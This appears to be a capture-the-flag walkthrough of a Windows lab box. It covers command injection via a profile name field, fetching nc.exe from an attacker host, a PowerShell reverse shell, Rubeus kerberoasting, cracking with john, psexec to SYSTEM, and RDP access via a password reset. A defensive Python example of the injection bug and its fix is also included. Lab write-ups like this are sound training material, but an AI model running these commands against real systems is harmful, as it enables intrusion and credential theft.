@comradecheese
Last active November 2, 2021 05:20

Medium KOTH

Enumeration

# basic port scan (-sC/-sV run default scripts and version detection; -T5 is fast but can miss ports on a lossy link)
sudo nmap -Pn -sV -sC -T5 <target-ip>

Port 80 is interesting. Create an account and navigate to the profile page. In the browser dev tools, block the request for script.js and reload the page so the profile form loads without its client-side script.

Attack

The change-name field on the profile is passed to a shell on the server: a name of the form "cheese | <command>" runs <command> with the web server's privileges. Use it for remote command execution.

# reverse shell listener (on attack machine)
nc -lvnp 9001

# fetch nc.exe onto the target via the name field (nc.exe must already be served on <attack-ip>:8000)
cheese | powershell curl <attack-ip>:8000/nc.exe -o nc.exe

# engage reverse shell (name field)
cheese | nc.exe <attack-ip> 9001 -e powershell

Windows shell foothold established.
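
The page does not show the server-side code behind the name field, only that "cheese | <command>" executes. The following is an added example, not code from the gist or from the box, that models the bug class with a constructed handler: the name interpolated into a shell command line beside the argv form that does not parse the pipe, plus an allowlist check a developer would put in front of either. Function names and the regex are assumptions.

```python
import re
import subprocess

# Constructed stand-in for the profile handler (assumption: the real server code is not on the page).


def set_name_vulnerable(name: str) -> str:
    # The name is interpolated into a shell command line. The shell parses the pipe,
    # so "cheese | <cmd>" runs <cmd> with the web server's privileges.
    completed = subprocess.run(f"echo {name}", shell=True,
                               capture_output=True, text=True)
    return completed.stdout


def set_name_fixed(name: str) -> str:
    # argv form: no shell is involved, so "|" is only a character inside one argument.
    completed = subprocess.run(["echo", name], capture_output=True, text=True)
    return completed.stdout


NAME_RE = re.compile(r"^[A-Za-z0-9 ._-]{1,64}$")  # assumption: what a display name needs


def is_valid_name(name: str) -> bool:
    # Defence in depth: allowlist the characters a display name needs; every shell
    # metacharacter the page's payloads rely on (| ; & $ ` < >) is rejected.
    return NAME_RE.fullmatch(name) is not None


# Constructed payload with the same shape as the page's, using a harmless command.
PAYLOAD = "cheese | printf injected"

if __name__ == "__main__":
    print(repr(set_name_vulnerable(PAYLOAD)))  # 'injected'
    print(repr(set_name_fixed(PAYLOAD)))       # 'cheese | printf injected\n'
    print(is_valid_name(PAYLOAD))              # False
```

Blocking script.js on the page removes only the client-side restriction; the fix belongs in the handler, where the argv form and the allowlist both stop the pipe.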

# fetch Rubeus.exe from Ghostpack-CompiledBinaries (run inside the PowerShell reverse shell, where curl is an alias for Invoke-WebRequest)
curl <attack-ip>:<port>/Rubeus.exe -o Rubeus.exe

# request service tickets for every account with an SPN and print the hashes on one line each
.\Rubeus.exe kerberoast /nowrap

# crack the ticket offline (save the $krb5tgs$ line into a file named hash)
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs hash

Privilege Escalation

# get a SYSTEM shell with impacket's psexec.py and the cracked credentials (needs local admin on the target, since psexec writes to ADMIN$)
python3 psexec.py troy.thm/achilles:winniethepooh@<target-ip>

Successfully elevated to NT AUTHORITY\SYSTEM.

# become king
cd C:\
echo <name> > king.txt

# find flags (cmd.exe syntax, which is the shell psexec.py drops you into)
dir /s flag*.txt
type Users\<user>\Desktop\flag.txt

# set up RDP access for the cracked account (resetting the password is loud and changes a credential other players may depend on)
net localgroup "Remote Desktop Users" achilles /add
net user achilles <newpassword>
xfreerdp /u:achilles /p:<newpassword> /v:<target-ip> /size:90%